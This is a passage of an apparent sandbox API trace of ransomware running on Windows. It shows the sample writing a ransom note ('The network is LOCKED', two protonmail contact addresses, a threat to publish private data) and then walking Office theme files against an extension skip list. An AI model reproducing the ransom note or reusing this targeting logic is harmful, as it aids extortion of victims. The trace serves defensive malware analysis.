hHeap=0xea0000) returned 1 [0157.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0157.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0157.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0157.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32a70 [0157.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0157.640] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32a70 | out: hHeap=0xea0000) returned 1 [0157.640] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0157.640] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0157.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0158.252] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0158.252] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0158.253] CloseHandle (hObject=0x6dc) returned 1 [0158.253] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.253] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.253] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x633f56d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x633f56d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0158.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0158.254] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x633f56d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x633f56d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.255] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0158.255] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0158.255] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd0aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adjacency.thmx", cAlternateFileName="ADJACE~1.THM")) returned 1 [0158.255] lstrcmpW (lpString1="Adjacency.thmx", lpString2=".") returned 1 [0158.255] lstrcmpW (lpString1="Adjacency.thmx", lpString2="..") returned 1 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".UAKXC") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".exe") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".dll") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".lnk") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".sys") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch=".msi") returned 0x0 [0158.255] StrStrIW (lpFirst="Adjacency.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.255] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0158.255] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.255] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.255] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0158.255] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedbf8 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.256] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f9d200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x62f9d200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x11098, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Angles.thmx", cAlternateFileName="ANGLES~1.THM")) returned 1 [0158.256] lstrcmpW (lpString1="Angles.thmx", lpString2=".") returned 1 [0158.256] lstrcmpW (lpString1="Angles.thmx", lpString2="..") returned 1 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".UAKXC") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".exe") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".dll") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".lnk") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".sys") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch=".msi") returned 0x0 [0158.256] StrStrIW (lpFirst="Angles.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0158.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedc90 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.256] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.256] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda5e100, ftCreationTime.dwHighDateTime=0x1cbded8, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfda5e100, ftLastWriteTime.dwHighDateTime=0x1cbded8, nFileSizeHigh=0x0, nFileSizeLow=0x3f427, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apex.thmx", cAlternateFileName="APEX~1.THM")) returned 1 [0158.256] lstrcmpW (lpString1="Apex.thmx", lpString2=".") returned 1 [0158.256] lstrcmpW (lpString1="Apex.thmx", lpString2="..") returned 1 [0158.256] StrStrIW (lpFirst="Apex.thmx", lpSrch=".UAKXC") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch=".exe") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch=".dll") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch=".lnk") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch=".sys") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch=".msi") returned 0x0 [0158.257] StrStrIW (lpFirst="Apex.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21178 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21178 | out: hHeap=0xea0000) returned 1 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21178 [0158.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0158.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.257] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd43200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3cd43200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x15a56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apothecary.thmx", cAlternateFileName="APOTHE~1.THM")) returned 1 [0158.257] lstrcmpW (lpString1="Apothecary.thmx", lpString2=".") returned 1 [0158.257] lstrcmpW (lpString1="Apothecary.thmx", lpString2="..") returned 1 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".UAKXC") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".exe") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".dll") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".lnk") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".sys") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch=".msi") returned 0x0 [0158.257] StrStrIW (lpFirst="Apothecary.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0158.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0158.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0158.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedd28 [0158.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.277] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1396800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1396800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x109e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aspect.thmx", cAlternateFileName="ASPECT~1.THM")) returned 1 [0158.277] lstrcmpW (lpString1="Aspect.thmx", lpString2=".") returned 1 [0158.277] lstrcmpW (lpString1="Aspect.thmx", lpString2="..") returned 1 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".UAKXC") returned 0x0 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".exe") returned 0x0 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".dll") returned 0x0 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".lnk") returned 0x0 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".sys") returned 0x0 [0158.277] StrStrIW (lpFirst="Aspect.thmx", lpSrch=".msi") returned 0x0 [0158.278] StrStrIW (lpFirst="Aspect.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.278] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211a0 [0158.278] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.278] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.278] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf211a0 | out: hHeap=0xea0000) returned 1 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211a0 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeeddc0 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.279] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4067b900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe598f420, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4067b900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1763b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Austin.thmx", cAlternateFileName="AUSTIN~1.THM")) returned 1 [0158.279] lstrcmpW (lpString1="Austin.thmx", lpString2=".") returned 1 [0158.279] lstrcmpW (lpString1="Austin.thmx", lpString2="..") returned 1 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".UAKXC") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".exe") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".dll") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".lnk") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".sys") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch=".msi") returned 0x0 [0158.279] StrStrIW (lpFirst="Austin.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211c8 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.279] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf211c8 | out: hHeap=0xea0000) returned 1 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211c8 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeede58 [0158.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.280] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668d5900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59b5580, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x668d5900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x9ff03, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Black Tie.thmx", cAlternateFileName="BLACKT~1.THM")) returned 1 [0158.280] lstrcmpW (lpString1="Black Tie.thmx", lpString2=".") returned 1 [0158.280] lstrcmpW (lpString1="Black Tie.thmx", lpString2="..") returned 1 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".UAKXC") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".exe") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".dll") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".lnk") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".sys") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch=".msi") returned 0x0 [0158.280] StrStrIW (lpFirst="Black Tie.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211f0 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf211f0 | out: hHeap=0xea0000) returned 1 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf211f0 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedef0 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.281] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ccef00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59b5580, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4ccef00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x18c11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Civic.thmx", cAlternateFileName="CIVIC~1.THM")) returned 1 [0158.281] lstrcmpW (lpString1="Civic.thmx", lpString2=".") returned 1 [0158.281] lstrcmpW (lpString1="Civic.thmx", lpString2="..") returned 1 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".UAKXC") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".exe") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".dll") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".lnk") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".sys") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch=".msi") returned 0x0 [0158.281] StrStrIW (lpFirst="Civic.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21218 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21218 | out: hHeap=0xea0000) returned 1 [0158.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21218 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0158.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.282] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fb4000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59db6e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x43fb4000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x105f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clarity.thmx", cAlternateFileName="CLARIT~1.THM")) returned 1 [0158.282] lstrcmpW (lpString1="Clarity.thmx", lpString2=".") returned 1 [0158.282] lstrcmpW (lpString1="Clarity.thmx", lpString2="..") returned 1 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".UAKXC") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".exe") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".dll") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".lnk") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".sys") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch=".msi") returned 0x0 [0158.282] StrStrIW (lpFirst="Clarity.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21240 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21240 | out: hHeap=0xea0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21240 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedf88 [0158.283] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.283] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.283] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, 